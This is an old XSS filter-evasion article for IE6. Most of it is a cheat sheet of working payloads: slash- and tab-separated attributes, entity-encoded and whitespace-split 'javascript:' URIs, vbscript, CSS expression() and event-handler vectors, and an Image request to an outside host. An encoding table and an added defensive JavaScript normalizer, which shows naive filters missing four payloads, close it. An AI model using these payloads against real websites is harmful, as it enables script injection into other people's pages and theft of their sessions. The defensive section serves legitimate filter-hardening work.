
HTML syntax features

Authors: Algol, zFailure. Last updated 06/13/2005

One of the main ways of protecting a site against XSS is to filter the characters a user enters. This article describes features of HTML syntax that can be used to get past such filters.

Note that XSS vectors are browser-dependent. All of the examples below were tested in IE6; in other versions or in other browsers they may not work at all. For example, the backtick character (`) is an attribute value delimiter only in IE. Other browsers, Opera for example, do not treat it as a delimiter.

  • Tag attribute delimiters.
    Besides the space, the following characters are accepted between attributes: slash ( / ), tab, line feed. The delimiter may be omitted altogether if the preceding attribute value is enclosed in quotes.
     <image/src="1.png"/alt="Hint"/border="0">   (slashes between attributes)
     <image	src="1.png"	alt="Hint"	border="0">   (tab characters between attributes)
     <image
     src="1.png"
     alt="Hint"
     border="0">   (line feeds between attributes)
     <image src="1.png"alt="Hint"border="0">   (no delimiter at all after a quoted value)
    
  • Attribute value delimiters
    Values may be enclosed in double quotes, single quotes (apostrophes) or backticks, or left with no delimiter at all.
     <image src="" alt="My hint" border="0">
     <image src="" alt='My hint' border="0">
     <image src="" alt=`My hint` border="0">   (backticks: IE only)
     <image src="" alt=Hint border="0">   (no delimiter; the value ends at the next whitespace)
    
  • Character encodings
    HTML character references in the attribute value are decoded before the script is executed, so the script source never has to contain the filtered characters literally:
     <img src=javascript:alert(&quot;ok&quot;)>
     <img src=javascript:alert(&#039;ok&#039;)>
     <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#111&#107&#39&#41>   (decodes to javascript:alert('ok'))
     <a href=javascript:alert(%22ok%22)>click me</a>   (URL decoding is applied only in the href attribute)
    
    
  • Script literal delimiters
     <img src=javascript:alert('ok')>
     <img src=javascript:alert("ok")>
     <img src=javascript:a=/ok/;alert(a.source)>   (a regular expression literal stands in for a quoted string)
     <img src=javascript:alert(String.fromCharCode(111,107))>   (no quote characters at all)
    
  • Bypassing filters on individual characters
     <img src=javascript:i=new/**/Image();i.src='http://bla.bla'>   (a JavaScript comment /**/ replaces the space, so the payload survives a filter that strips spaces)
     
  • Ways to run scripts
    Several ways of running a script automatically:
     <script>alert('ok')</script>
     <script src=1.js></script>
     <body onLoad=alert('ok')>
     <meta http-equiv=Refresh content=0;url=javascript:alert('ok')>
     <image src=1.png onload=alert('ok')>
     <image src=javascript:alert('ok')>
     <image src="" onerror=alert('ok')>
     <hr style=background:url(javascript:alert('ok'))>
     <span style=top:expression(alert('ok'))></span>
     <span sss="alert();this.sss=null" style=top:expression(eval(this.sss));></span>   (runs only once: the attribute is cleared after the first evaluation)
     <style type="text/css">@import url(javascript:alert('ok'));</style>
     <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('ok')></object>
     <embed src=javascript:alert('ok');this.avi>
     <embed src=javascript:alert('ok');this.wav>
     <iframe src=javascript:alert('ok')>   (IE only)
     <a href=javascript:alert(%22ok%22)>click me</a>   (runs only when the link is clicked)
     <a href=javascript:alert('aaa'+eval('alert();i=2+2')+'bbb')>click me</a>   (runs only when the link is clicked)
     <br SIZE="&{alert('XSS')}">   (Netscape 4.x only)
    
    
  • Script protocols and the ways of writing them
     <img src=javascript:alert()>
     <img src=vbscript:AleRt()>
     <img src=JaVasCriPt:alert()>   (the scheme name is case-insensitive)
     <img src="   javascript:alert()">   (whitespace before the word javascript)

     <img src=&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116:alert()>   (the scheme name written as numeric character references)
     <img src=javascript&#9:alert()>
     <img src=javascript&#10:alert()>
     <img src=javascript&#13:alert()>   (tab, line feed or carriage return between the scheme name and the colon)
     <img src="javascript
     :alert()">   (a literal tab character before the colon)

     <img src="java
     scri
     pt:ale
     rt()">   (literal tab and carriage return characters inside the word javascript)
     
    
  • Scripts inside the style attribute
    Script statements inside the style attribute must be separated with "\;" (a backslash-escaped semicolon, so that the CSS parser does not treat it as the end of the declaration):
     <hr style=`background:url(javascript:alert('ok 1')\;alert('ok 2'))`>
    
  • Special tags.
     <image src="1.png" alt="" border="0">   (the image tag works the same way as img)
     <plaintext>   (everything after this tag is rendered as plain text and is not parsed as HTML at all)
     <textarea>   (everything after this tag is shown as plain text and is not parsed as HTML)
     <xml>   (everything after this tag is not displayed at all)
    
    
  • Table of frequently used codes:

    Character          Decimal *   Hex       Named entity *   URL-encoded
    "                  &#34        &#x22;    &quot            %22
    '                  &#39        &#x27;                     %27
    `                  &#96        &#x60;                     %60
    <space>            &#32        &#x20;                     + (or %20)
    <tab>              &#9         &#x09;                     %09
    <carriage return>  &#13        &#x0D;                     %0D
    =                  &#61        &#x3D;                     %3D
    <                  &#60        &#x3C;    &lt              %3C
    >                  &#62        &#x3E;    &gt              %3E
    \                  &#92        &#x5C;                     %5C
    %                  &#37        &#x25;                     %25
    +                  &#43        &#x2B;                     %2B
    <soft hyphen>      &#173       &#xAD;    &shy             %AD
    &                  &#38        &#x26;    &amp             %26

    * In some cases the semicolon can be omitted: when the reference is at the end of the value, or when several references in this encoding follow one another.
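    The practical consequence of the Character encodings section, the script protocol spellings and the table above is that a filter has to compare what the browser will execute, not the raw bytes it received. The following is an added example (not code from the original article): a small JavaScript normalizer that applies the decoding rules shown on this page (character references with optional semicolons, whitespace before the colon, tab/CR/LF inside the scheme name, case-insensitive scheme) before deciding whether an attribute value is a script URL. The naiveFilterBlocks() function is an assumed stand-in for the kind of substring filter the article's payloads get past, the sample values are taken from the article's own examples plus a constructed http://example.invalid/ control case, and the &apos; entity is deliberately left out because it is not in the table.

```javascript
// Added example, not part of the original article: normalize an attribute value
// the way a lenient browser does before comparing its URL scheme, and contrast
// it with an assumed substring filter that looks for the literal "javascript:".

// Named references from the table on this page (no &apos;).
const NAMED_ENTITIES = { quot: '"', lt: '<', gt: '>', amp: '&', shy: '\u00AD' };

// Decode HTML character references as a lenient parser does in attribute values:
// the trailing semicolon is optional, hex and decimal numeric forms are both
// accepted, and unknown names are left untouched.
function decodeEntities(value) {
  return value.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (match, body) => {
    if (body[0] === '#') {
      const hex = body[1].toLowerCase() === 'x';
      const cp = hex ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return Number.isFinite(cp) && cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named === undefined ? match : named;
  });
}

// The URL scheme the browser would see for an attribute value, lower-cased,
// or null when the value has no scheme (a relative path such as 1.png).
function schemeOf(attrValue) {
  const cleaned = decodeEntities(attrValue)
    .replace(/^[\s\u0000-\u001f]+/, '') // whitespace before the word javascript
    .replace(/[\t\n\r]/g, '');         // tab, LF, CR anywhere inside the scheme name
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

const SCRIPT_SCHEMES = new Set(['javascript', 'vbscript']);

// What the browser would actually execute.
function isScriptUrl(attrValue) {
  return SCRIPT_SCHEMES.has(schemeOf(attrValue));
}

// Assumed naive filter: a substring match on the raw value (the kind this article bypasses).
function naiveFilterBlocks(attrValue) {
  return /javascript:/i.test(attrValue);
}

// Values the naive filter lets through although the browser would run them.
function missedByNaiveFilter(values) {
  return values.filter((v) => isScriptUrl(v) && !naiveFilterBlocks(v));
}

// Constructed sample attribute values, taken from the article's own payloads;
// the http URL and 1.png are made-up non-script control cases.
const SAMPLES = [
  'javascript:alert(&quot;ok&quot;)',
  '&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#111&#107&#39&#41',
  'javascript&#9:alert()',
  'java\tscri\rpt:ale\nrt()',
  '   javascript:alert()',
  'JaVasCriPt:alert()',
  'vbscript:AleRt()',
  'http://example.invalid/1.png',
  '1.png',
];

for (const v of SAMPLES) {
  console.log(JSON.stringify(v), '-> scheme:', schemeOf(v),
    '| naive filter blocks:', naiveFilterBlocks(v), '| browser runs:', isScriptUrl(v));
}
console.log('missed by naive filter:', missedByNaiveFilter(SAMPLES).length);
```

    The point of the comparison is the last line: four of the article's payloads pass the substring filter untouched while the normalizer classifies all of them as script URLs. Anything that wants to allow user-supplied URLs should normalize first and then compare the scheme against an allow-list (http, https, mailto), rather than search the raw value for a forbidden string.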

    See also: http://ha.ckers.org/xss.html